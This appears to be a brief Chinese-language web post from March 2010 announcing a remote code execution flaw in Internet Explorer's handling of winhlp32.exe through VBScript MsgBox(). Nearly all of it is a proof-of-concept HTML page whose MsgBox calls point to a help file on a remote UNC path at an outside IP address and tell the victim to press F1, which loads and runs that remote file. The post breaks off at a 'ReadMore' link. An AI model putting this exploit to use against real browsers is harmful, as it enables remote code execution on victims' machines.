Internet Explorer的’winhlp32.exe中’MsgBox()’远程执行代码漏洞
测试代码: <html> <script type="text/vbscript"> big = "\\184.73.14.110\PUBLIC\test.hlp" //For i=1 to 2500 // big = big & "\..\" //Next MsgBox "please press F1 to save the world", ,"please save the world", big, 1 MsgBox "press F1 to close this annoying popup", ,"", big, ReadMore
2010年03月03日 |